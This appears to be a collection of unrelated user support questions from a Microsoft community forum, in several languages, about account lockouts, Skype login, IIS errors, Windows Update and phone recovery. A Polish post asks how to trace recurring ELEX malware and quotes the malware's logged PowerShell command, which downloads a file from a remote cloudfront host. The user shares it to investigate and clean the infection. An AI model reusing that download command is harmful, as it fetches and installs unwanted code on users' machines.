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Sign in problems


I moved over to Australia temporarily 3 months ago I am still here now, I have been using both emails since I arrived and only a few weeks ago, I had messages to advise me I need to confirm the account security which was fine, but then it has taken me through these questions which are very basic and a security question which I don't really remember the answer to as I have had this email for 16 years so its no wonder I do not remember it! The phone number linked to the email is my English phone number and yet again I don't have that as I am now in Australia so I sent the code to my other email address that I have on outlook to verify the account and again it asks me to complete a bunch of questions and now its made me do three attempts or more and it has locked me out of my account!!!

Now I don't know how or what needs to be done but I need access back to my account, as I have people sending me job requests, I have old contacts on there and this is linked to a few of my accounts for example my bank etc and I am not going to open a new one and start everything again !

IIS 8.5 Wen page loading slow

My IIS 8.5 website on .NET 4.6 framework has web pages that are loading very slow or not loading up at all. Where should I look for to find root cause? I have observed frequent occurrences of below exception in Windows Event Viewer.

The state server has closed an expired TCP/IP connection. The IP address of 
the client is The expired Read operation began at mm/dd/yyyy hh:mm:ss.
Source: ASP.NET 4.0.30319.0
Event ID : 1078

microsft planner



titulaire d'une licence office 365 personnel, je n'arrive pas à installer microsft planner : je peux intégrer l'extension dans outloock mais lorsque je tente de lancer le logiciel, il est indiqué une erreur de connection alors que j'ai pourtant bien un compte microsoft.

Que puis-je faire ?



Serface RTで急にタッチスクリーンが反応しなくなった









request of Log-in

I have a log-in request for my Skype. I have registered the Skype account by kimo.com.tw mail long time ago.  Recently, when I upgrade the Skype system, I can't log in my Skype account because you request me receive the verification code by email. Due to the merger of Kimo and Yahoo, I CAN'T receive the verification code by kimo email. It is very unfair and I can's use my skype anymore due the above reason. Hope you can help me to solve the problem. Many thanks.

surface 2 keyboard, F8 key no function, cannot share files, after updating RS2

Just like I say in subject, after updating system RS2, the key F8 cannot work, i cant get the page with sharing message, however , it works under system RS1 and TH2. Is that the rs2 cancel this function or other reasons ?

Cortana don't show the weather when I asked her :"How's the weather " or "What's the weather". How can I fix this ??


Cortana don't show the weather when I asked her :"How's the weather " or "What's the weather". How can I fix this ??

Перенос истории чата с iPad на PC

Возникла проблема с переносом чата с айпада на пк , не смог найти файл main.db . Ipad обновлен до 9.3.5 и установлен skype for ipad. Подскажите где его можна найти? Либо подскажите возможно ли это в принципе.

Jak ustalić co wywołało komendy PowerShell?


Na nowym komputerze z Windows 10 przy instalacji jednego z programów, zainstalował się w systemie malware znany jako ELEX (przykładowe skanowanie jednego z plików, jakie pozostawił na dysku: https://www.virustotal.com/pl/file/f6f33f735d1501c4cfd1bc0056efe240395f30067383153f9e76655d264e3e26/analysis/).

Malware ten instaluje przeglądarkę Firefox i Chrome (lub ich zmodyfikowane wersje) oraz doinstalowuje kilka Usług.

Usuwałem te przeglądarki i usługi, ale co tydzień lub dwa instalują się ponownie (usługi pod różnymi mylącymi nazwami, np. Windows Cache Services). Poza tym zauważyłem w rejestrze, że dodaje też własne reguły na firewallu (malware uruchamia się z uprawnieniami systemowymi).

Jestem informatykiem, więc chcę ręcznie znaleźć źródło problemu - jaki proces wciąż na nowo instaluje te programy i usługi - jednak logi Windowsa nie dają wystarczająco informacji.

Co udało mi się ustalić. Najwcześniejsze zdarzenia w Dzienniku Zdarzeń gdy ELEX ostatnim razem instalował na nowo swoje usługi i przeglądarki, to:

1. 24 maja o godz. 14:46:13 - dodanie usługi VBoxDrv (tak jest za każdym razem). Jednak logi nie pokazują:

- co zainstalowało tą usługę

- kiedy i co ją usunęło (nie widzę takiej usługi)

- kiedy ta usługa została wywołana

- co zrobiła ta usługa po jej instalacji i uruchomieniu

2. Mimo braku tych informacji w dzienniku systemu Windows, udało mi się znaleźć w dzienniku aplikacji PowerShell, że o godz. 14:45:20(niecałą minutę wcześniej) uruchomiony został PowerShell:

a pierwszą komendą była poniższa:

Wklejam pełną treść tego zdarzenia / komendy:

Provider "Registry" is Started. 



HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $client = new-object System.Net.WebClient;$client.DownloadFile('http://d2hrpnfyb3wv3k.cloudfront.net/provide?clients=1D7A59692BE9806EF5F4311A5BB7AF30&reqs=visit.cpk.install.false','44')

Jednak nie wydaje mi się, aby dawało to informację co wywołało te komendy PowerShell - tu więc trop się urywa.

Gdybym wiedział co wywołuje te komendy, mógłbym usunąć ten proces. Jak mogę zwiększyć dokładność logów, aby to ustalić?

zablokovaný MS účet


Dobrý den,

pro instalaci MS Office 2016 na firmě je nutné to dělat přes MS účet. Tzn. jak u blbých se každému zaměstnanci musí vytvořit účet (hromadně na jeden to nelze, protože se v tom nedá vyznat). Tzn. každému zaměstnanci vytvoříme MS ID s jeho firemním mailem (aby v případě odchodu z firmy si sebou nevzal i Office) a dostatečně silným heslem (mobil firemní na daného zaměstnance). Nyní jsem se jen letmo zkusil přihlásit na některé účty a všechny do jednoho jsou zablokovány s uvedením důvodu že se z toho účtu spamovalo nebo z jiného důvodu. Spamovat se z toho nemohlo, protože hesla jsou silná, po instalaci se do toho účtu ani nikdo dál nepřihlásil.

Přijde mi dost divné, že MS zablokuje něco, co se váže k zakoupené licenci. Asi mohu pomocí SMS na mobil účet odblokovat, ale co kdžy se za půl roku změní mobilní číslo? Je nějaký postup, jak to reklamovat u MS?


A bulk of my contacts suddenly went missing !!! By default were saved to outlook on my phone and contacts I've saved from 6 months back went missing !!! Only 30 contacts left disappeared and reappeared but the rest are still Missing ! Tried contacting the entire Microsoft but one one had the ability rectify this. Tried to restore "deleted contacts" but there's nothing for me to restore. Please help !!!

Unusual activity detected, sign-in from Microsoft IP address.



Lately. when i have a check on the account security recent activity log, found out weird "Unusual activity detected". FirstSession activity :Successful sign-in from oversea, Singapore. Already feedback to customer service. So, i changed the password and activatedtwo-step verification. For the first few days, log look normal, until now a "Unusual activity detected". Session activity :Successful sign-in/Additional verification requestedfrom HongKong, look odd. How can it happening? Both incident, i tracking the IP address using IP Lookup, it's belong to Microsoft. First incident is Singapore, Second is from Hongkong Microsoft Azure.

Device/platform,Unknown. Browser/app alsoUnknown. I have a look on Microsoft Azure website, i don't have a account for the Azure.

Any of you have the same experienced?

Thank you

ERROR EN WINDOWS 10 - x64 (KB4019472) - Error 0x80070776



Quisiera saber si alguien me podria ayudar con un error que estoy teniendo en mi notebook con el tema de windows update, ya lo intente de todas las maneras posibles ya busque por todas partes la solucion con el windows pc fixer, con el troubleshoter de windows pero nada

por favor si alguien me podria ayudar para poder actualizar mi pc y poder quedarme sin problemas en ella le agradeceria. 

Issues after migrating from Excel 2010 to Excel 2013


We have a excel.xlsm application which has multiple user forms and we use it to create many excel xlsx and .xlsm sheets during the running of the application. The application is a VBA project. After migarting it form excel 2010 to excel 2013 we are facing certain issues.

I have listed the issues below:


If any excel spreadsheets are open in Excel 2013 and we try to run MSIS application, we are facing issues which are inconsistent. The issues are listed below:

  1. The application freezes and turns to not responding.
  2. Blank gray excel sheets are being opened on closing the application.
  3. Excel workbook gets closed but it is still visible in the VB editor.

Any help in this regard would be appreciated.

Thank You.

Самопроизвольный запуск Броузера


Происходит самопроизвольный запуск броузера Google chrome причем почти каждые пол часа.
Я вначале думал, что это вирус. Но сносил броузер и ставил другую версию. Тот же результат.
Выскакивают то ли рекламы сайта Розетка, то ли Parimatch, то ли Pocker.

Удаление записей из реестра ничего не дает.

Windows Defender Unstoppable


Currently using Win8.1.  Up until a few days/weeks ago, I could manually stop and start my Windows Defender.

Now, I no longer have the ability to do so in services.msc nor is there an Administrator option within Windows Defender itself that allows me to say I don't want to use it, even if temporarily.

How can I disable Windows Defender in Windows 8.1 now, since all obvious options are no longer available?

Making a mp4 video from Powerpoint: slides jerky in transition, sound is distorted


I have been trying to make a video using PowerPoint. When I don't use the transition effects, the slides jerk/show residue from the previous slide momentarily when they change. If I try to use the transition effects, the images change smoothly, but the sound becomes degraded. Does anyone have advice?

Typo in the email address. Fixed it but cannot download app


At first I typed a wrong email address in my account. Then I fixed it too by changing the email address on microsoft . But when I try to install whatsapp , After some time it shows up the old wrong email adddress.

And it is also written that 

"Typo in your email address . Fix it here"

On clicking here it shows up 

"There is a temporary problem. Try again later"

I have tried this for 1 month it is not working

How to download whatsapp?

Remote Server returned '550 5.7.501 Service unavailable, Client host blocked using Spamhaus

Split from this thread.

My problem here is as follows.

I am using Office 365 Business Premium. This means that I am using Microsoft Exchange servers hosted by Microsoft that obviously hosts many other mailboxes as well.

So what is happening here is that ANY of the myriads of people using the same Exchange Server as me can cause this problem?

This in turn affects everyone on that same e-mail server?

Am missing something here, or is this a very bad solution that will cause more issues than good?

Восстановление Lumia 640

Помогите, никак не могу откатить Lumia 640 LTE (односимочный, Ростест) с релизной 10-ки (10586.420) на родную 8.1. Запускаю последнюю версию Windows Device Recovery Tool (v3.7.18601), телефон обнаруживается, скачивается пакет прошивки, а при попытке переустановки выдает, что телефон не найден, сведения: Выдано исключение типа "Microsoft.WindowsDeviceRecoveryTool.ModelExpertions.DeviceNotFoundExpertion".
Способом ручной перепрошивки тоже не получается, выдает:
Microsoft Windows [Version 10.0.10586]
(c) Корпорация Майкрософт (Microsoft Corporation), 2015. Все права защищены.
C:\Windows\system32>cd C:\Program Files (x86)\Microsoft Care Suite\Windows Device Recovery Tool
C:\Program Files (x86)\Microsoft Care Suite\Windows Device Recovery Tool>thor2 -mode uefiflash -ffufile "C:\ProgramData\Microsoft\Packages\Products\RM-1072\RM1072_02177.00000.15184.36002_RETAIL_prod_signed_1062_0252F2_000-RU_MV.ffu" -do_full_nvi_update -do_factory_reset
Built for Windows @ 13:36:46 Jun 16 2015
Thor2 is running on Windows of version 6.2
thor2 -mode uefiflash -ffufile C:\ProgramData\Microsoft\Packages\Products\RM-1072\RM1072_02177.00000.15184.36002_RETAIL_prod_signed_1062_0252F2_000-RU_MV.ffu -do_full_nvi_update -do_factory_reset
Process started Fri Jul 08 13:15:19 2016
Logging to file C:\Users\name\AppData\Local\Temp\thor2_win_20160708131519_ThreadId-6592.log
Debugging enabled for uefiflash
Initiating FFU flash operation
WinUSB in use.
Operation took about 1 minute, 0 seconds.
THOR2 exited with error code 84003 (0x14823)
C:\Program Files (x86)\Microsoft Care Suite\Windows Device Recovery Tool>
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